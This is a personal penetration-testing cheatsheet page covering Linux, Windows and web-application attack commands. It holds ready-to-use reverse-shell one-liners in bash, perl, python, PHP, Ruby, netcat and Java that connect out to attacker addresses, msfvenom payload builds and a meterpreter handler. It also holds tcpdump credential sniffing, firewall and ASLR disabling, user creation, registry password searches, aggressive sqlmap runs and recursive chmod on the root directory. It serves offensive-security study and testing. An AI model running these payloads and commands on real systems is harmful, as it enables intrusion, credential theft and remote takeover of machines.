---
title: Pentesting
author: Matteo Malvica
permalink: /pentesting/
layout: post
image: /assets/images/5.png
categories: wiki
featured-img: https:/avanzo.github.io/assets/images/header_nero_sito_1200px256px.jpg
header:
  image: https:/avanzo.github.io/assets/images/2.png
  overlay_image: https:/avanzo.github.io/assets/images/header_nero_sito_1200px256px.jpg
  image_description: banner
  overlay_filter: rgba(0, 0, 0, 0.3)
  cta_label: "@avanzo"
---

# Pentesting Cheatsheet

An unstructured list of bolts & clamps I have collected over time.

{% include toc.html %}

## Linux

### Privileges

find all programs with the setuid or setgid bit set (`-perm -6000` would only match files that have both)
find / -perm /6000 -print

set file immutable (even root cannot delete or modify it until the flag is cleared)
chattr +i test.txt

set file append-only: new content can be added, existing content cannot be removed
chattr +a test.txt

verify the immutable flag (and the other attribute flags)
lsattr test.txt

recursively revoke read, write and execute permission from group and others (as written, on everything under /)
chmod -R go-rwx /*

recursively grant read and execute permission to all users (as written, on everything under /)
chmod -R a+rx /*

umask 0000 makes every newly created file readable and writable by everyone; it does not restrict who can delete files. Letting only a file's owner (or root) delete files in a shared directory is the job of the sticky bit on that directory, not of the umask.
umask 0000

### cat, grep & misc commands

cat all .txt files recursively; list every file and keep the entries whose name contains "passwd"; grep for "password" in files named foo
find . -name '*.txt' -exec cat {} \;
find . -name '*' -exec ls -asl {} \; 2>/dev/null | grep passwd
find . -name foo -type f -print0 | xargs -0 grep "password"

find a pattern in a file and suppress stderr (two equivalent forms)
grep 'pattern' file 2>/dev/null
grep -s 'pattern' file

### Network Scanning

unicornscan UDP scan over the tunnel interface (often faster than nmap)
unicornscan -mU -p 161 10.11.1.0/24 -i tap0

masscan over the tunnel interface
masscan -p1-65500 10.11.1.219 --interface tap0 --router-mac 00-50-56-89-35-90

### Traffic Dump

grab everything between two keywords
tcpdump -i eth0 port 80 -X | sed -n -e '/username/,/=ldap/ p'

grab user and pass sent over plain HTTP
{% highlight text %}
tcpdump -i eth0 port http -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20
{% endhighlight %}

### SSH Port Forwarding

SSH local port forwarding
Make services on the remote network accessible to your host via a local listener. The service running on the remote host on TCP port 8834 becomes reachable by connecting to port 8834 on the SSH client system.
ssh -L 8834:localhost:8834 user@target_ip

SSH remote port forwarding
Make services on your local system / local network accessible to the remote host via a remote listener. The SSH server will be able to reach TCP port 80 on 172.16.0.99 (a host reachable from the SSH client) by connecting to 127.0.0.1:8000 on the SSH server.
ssh -R 127.0.0.1:8000:172.16.0.99:80 10.0.0.1

### Password cracking and wordlists

Crunch Wordlist Generator

{% highlight text %}
crunch - wordlist generator, placeholders for the -t pattern:
@ - lower case alpha characters
, - upper case alpha characters
% - numeric characters
^ - special characters including space

example (8-character words: one upper, two lower, two special, three digits):
crunch 8 8 -t ,@@^^%%%
{% endhighlight %}
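Added example, not part of the original cheatsheet: a small Python helper that sizes the keyspace a crunch `-t` pattern generates, so a defender can judge how long a mask-shaped password policy survives at an assumed guessing rate. The class sizes are crunch's default character sets (an assumption), and `mask_of` goes beyond the page by mapping a given password back onto the mask that would regenerate it.

```python
import math

# Character-class sizes for crunch -t placeholders (assumption: crunch's default
# sets; @ = 26 lower, , = 26 upper, % = 10 digits, ^ = 33 symbols incl. space).
CLASS_SIZES = {"@": 26, ",": 26, "%": 10, "^": 33}


def keyspace(pattern: str) -> int:
    """Number of candidates `crunch <n> <n> -t <pattern>` would emit.

    Each placeholder multiplies by its class size; any other character is a
    fixed literal and contributes a factor of 1.
    """
    total = 1
    for ch in pattern:
        total *= CLASS_SIZES.get(ch, 1)
    return total


def entropy_bits(pattern: str) -> float:
    """Effective entropy of the mask in bits (log2 of the keyspace)."""
    return math.log2(keyspace(pattern))


def exhaust_seconds(pattern: str, guesses_per_second: float) -> float:
    """Worst-case time to try every candidate at a given guessing rate."""
    return keyspace(pattern) / guesses_per_second


def mask_of(password: str) -> str:
    """Map a password onto the crunch mask that regenerates it, so a policy
    ("one upper, one digit, one symbol ...") can be judged by the size of the
    masks it actually produces rather than by its character count."""
    out = []
    for ch in password:
        if "a" <= ch <= "z":
            out.append("@")
        elif "A" <= ch <= "Z":
            out.append(",")
        elif "0" <= ch <= "9":
            out.append("%")
        else:
            out.append("^")
    return "".join(out)


if __name__ == "__main__":
    # 1e9 guesses/s is an assumed rate for a fast hash on a single GPU.
    for p in (",@@^^%%%", "@@@@@@@@", mask_of("Pa55w0rd!")):
        print(p, keyspace(p), round(entropy_bits(p), 1), round(exhaust_seconds(p, 1e9)))
```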

Custom dictionary from a website
cewl -d 2 -m 5 -w docswords.txt http://docs.kali.org

Create a Norwegian wordlist using words from Wikipedia
{% highlight text %}
wget http://download.wikimedia.org/nowiki/latest/nowiki-latest-pages-articles.xml.bz2

bzcat nowiki-latest-pages-articles.xml.bz2 | grep '^[a-zA-Z]' | sed 's/[-_:.,;#@+?{}()&|§!¤%`<>="/]/\ /g' \
  | tr ' ' '\n' | sed 's/[0-9]//g' | sed 's/[^A-Za-z0-9]//g' | sed -e 's/./\L\0/g' \
  | sed 's/[^abcdefghijklmnopqrstuvwxyzæøå]//g' | sort | uniq | pw-inspector -m1 -M20 > nowiki.lst
{% endhighlight %}

### Reverse-shell oneliners

bash
{% highlight text %}
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
{% endhighlight %}

perl
{% highlight text %}
perl -e 'use Socket;$i="192.168.26.31";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
{% endhighlight %}

python
{% highlight text %}
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.26.31",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
{% endhighlight %}

PHP

Reverse Shell
{% highlight text %}
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
{% endhighlight %}
Command backdoor
{% highlight text hl_lines="1 3 4" %} {% endhighlight %}

Ruby
{% highlight text %}
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
{% endhighlight %}

Netcat
{% highlight text %}
nc -e /bin/sh 10.0.0.1 1234
{% endhighlight %}

Java
{% highlight text %}
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()
{% endhighlight %}

Xterm
{% highlight text %}
xterm -display 10.0.0.1:1
{% endhighlight %}

### SMB

List shares
smbclient -L 1.2.3.4

Connect to share
smbclient \\\\1.2.3.4\\SHARE

Nmap SMB vulnerability scripts:
{% highlight text %}
nmap -v -p 139,445 [IP] --script=smb-vuln-conficker.nse
nmap -v -p 139,445 [IP] --script=smb-vuln-cve2009-3103.nse
nmap -v -p 139,445 [IP] --script=smb-vuln-ms06-025.nse
nmap -v -p 139,445 [IP] --script=smb-vuln-ms07-029.nse
nmap -v -p 139,445 [IP] --script=smb-vuln-ms08-067.nse
nmap -v -p 139,445 [IP] --script=smb-vuln-ms10-054.nse
nmap -v -p 139,445 [IP] --script=smb-vuln-ms10-061.nse
nmap -v -p 139,445 [IP] --script=smb-vuln-ms17-010.nse
nmap -v -p 139,445 [IP] --script=smb-vuln-regsvc-dos.nse
{% endhighlight %}

### SNMP

community-string guessing with onesixtyone (-c community wordlist, -i host list)
{% highlight text %}
onesixtyone -c <community file> -i <host list>
{% endhighlight %}

walk the MIB tree with a known community string
{% highlight text %}
snmpwalk -c <community> -v <1|2c> <host>
{% endhighlight %}

### MSFVenom

Windows

Staged reverse TCP
{% highlight text %}
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe
{% endhighlight %}

Stageless (single) reverse TCP
{% highlight text %}
msfvenom -p windows/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe
{% endhighlight %}

Linux

Staged reverse TCP
{% highlight text %}
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
{% endhighlight %}

Stageless (single) reverse TCP
{% highlight text %}
msfvenom -p linux/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
{% endhighlight %}

VBA/VBS payload
{% highlight text %}
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=8080 -e x86/shikata_ga_nai -f vba-exe
{% endhighlight %}

### Meterpreter

Meterpreter handler template
{% highlight text %}
use exploit/multi/handler
set PAYLOAD osx/x64/meterpreter/reverse_tcp
set LHOST 10.10.1.12
set LPORT 4444
set ExitOnSession false
exploit -j -z
{% endhighlight %}

### Compiling

create the object file, then link it (-z execstack marks the stack executable so the shellcode can run)
nasm -f elf -o shellcode.o shellcode.nasm
ld -melf_i386 -z execstack -o shellcode shellcode.o

compile in one go
gcc -z execstack -o shellcode shellcode.c

compile a 64-bit Windows PE on Kali
x86_64-w64-mingw32-gcc shell.c -o shell.exe

compile a 32-bit Windows PE on Kali
i686-w64-mingw32-gcc shell.c -o shell.exe

generate only the assembly (Intel syntax) from C code
gcc -S -fno-asynchronous-unwind-tables -masm=intel *.c

### Binary Exploitation and Reversing

ASLR

disable ASLR system-wide (0 = off, 1 = conservative, 2 = full randomization; 1 would not disable it)
echo 0 > /proc/sys/kernel/randomize_va_space

disable ASLR for a single bash session instead of the whole OS
setarch $(uname --machine) --addr-no-randomize bash

PWN TOOLS

assemble shellcraft's /bin/sh shellcode and print the machine-code bytes
from pwn import *
print(repr(asm(shellcraft.sh())))

Ret2LibC

find the /bin/sh string inside libc (the address range is libc's mapping in the running process)
{% highlight text %}
(gdb) break main
Breakpoint 1 at 0x8048570
(gdb) run
Starting program: /root/Desktop/RE/intro_rev_binary_expl/exploitation/examples/hello

Breakpoint 1, 0x08048570 in main ()
(gdb) find 0xf7dba000,0xf7f8c000,"/bin/sh"
0xf7f35988
1 pattern found.
{% endhighlight %}

### RADARE2 Cheat sheet

https://github.com/zxgio/r2-cheatsheet/blob/master/r2-cheatsheet.pdf

## Windows

### Version information

{% highlight text %}
NT version   Windows release
5.0          2000
5.1          XP / legacy
5.2          XP 64-bit / Server 2003 (R2)
6.0          Vista / Server 2008
6.1          7 / Server 2008 R2 / Home Server 2011
6.2          8 / Server 2012
6.3          8.1 / Server 2012 R2
10.0         10 / Server 2016
{% endhighlight %}

### Basic enumeration

General system info
systeminfo
Get hostname
hostname
Current user
whoami
Current user, groups and privileges
whoami /all
IP and networking
ipconfig /all
route print
netstat -bano
netstat -r
Windows grep (findstr)
command | findstr /C:"str"
current PATH
path
run "executable" with the profile and permissions of the user given to /user:
runas /profile /user:administrator "C:\absolute\path\pcoff.exe"
run a process in the background
START /B process.exe
execute all files in a directory (%%i is the batch-file form; from an interactive prompt use %i)
for %%i in (C:\abs\path\*) do %%i
OR
for /F "usebackq" %i in (`dir /b C:\macros\Day\`) DO %i

### User

current user and local users
whoami
net users
list users in the current domain
net user /domain
list user info
net user username
add a local user
net user name pass /add
set a user's password (here to "setpword")
net user name setpword
check the current user's domain account, including group membership
net user /DOMAIN %USERNAME%
check another user's information
net user /domain user
list users in an AD group
net group "Domain Users" /domain
list members of domain local and global groups
net localgroup "administrators" /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net group "Domain Controllers" /domain
add a user (here "trinity") to the local Remote Desktop Users group
NET LOCALGROUP "Remote Desktop Users" trinity /ADD
List password policy for localhost and for the domain
net accounts
net accounts /domain

### Networking

view full ARP table
arp -a
view hosts offering network shares
net view
view available shares on a host
net view \\HOST
Queries NBNS/SMB (SAMBA) and tries to find all hosts in 'otherdomain'
net view /domain:otherdomain
Lists tasks, with the users running them, on a remote system
tasklist /V /S computername
Firewall
netsh firewall show state
netsh firewall show config
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off
Configure the NIC to use DHCP
netsh interface ip set address local dhcp
open a port (for rdesktop)
netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389
block a port from a given remote IP (here TCP 1433, mssql)
netsh advfirewall firewall add rule name="Block mssql attack ips" dir=in action=block protocol=TCP localport=1433 remoteip=22.75.175.213

Auto-Start Directories
{% highlight text %}
Windows NT 6.1, 6.0            %SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
Windows NT 5.2, 5.1, 5.0       %SystemDrive%\Documents And Settings\All Users\Start Menu\Programs\StartUp
Windows 9x                     %SystemDrive%\WINDOWS\Start Menu\Programs\StartUp
Windows NT 4.0, 3.51, 3.50     %SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\StartUp
{% endhighlight %}

### SMB

map a remote drive to a local drive letter
net use * \\remote_ip\c$ password /u:remote_ip\username
verify mapped shares
net use [sharename]

### Powershell

locally use PS to execute a command as admin, given the admin password
{% highlight powershell %}
$user = "PC\Administrator"
$password = "test1234"
$pass_string = ConvertTo-SecureString -AsPlainText -Force $password
$cred = New-Object System.Management.Automation.PSCredential($user, $pass_string)
Invoke-Command -ComputerName 127.0.0.1 -Credential $cred -ScriptBlock { type C:/Users/Administrator/Desktop/root.txt ; type C:/Users/h.potter/user.txt }
{% endhighlight %}

### Privilege Escalation

Full permissions for Everyone or Users? replace (F) with (M) to check for modify rights (cmd syntax)
{% highlight text %}
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users"
{% endhighlight %}

Unquoted service paths? (auto-start services outside C:\Windows whose path is not quoted; cmd syntax)
{% highlight text %}
wmic service get name,displayname,pathname,startmode 2>nul | findstr /i "Auto" 2>nul | findstr /i /v "C:\Windows\\" 2>nul | findstr /i /v """
{% endhighlight %}

Passwords in registry?
reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s


## Web Applications

### Parsing

dump a page as plain text
{% highlight text %}
curl [IP] -s -L | html2text -width '99' | uniq
{% endhighlight %}

### Injections

SQLi

SQLmap example (pick one of the --dbms values)
{% highlight text %}
sqlmap -m [external url list] --crawl=6 --threads=10 --random-agent --dbms=mysql|mssql|postgresql|oracle --level=5 --risk=3
{% endhighlight %}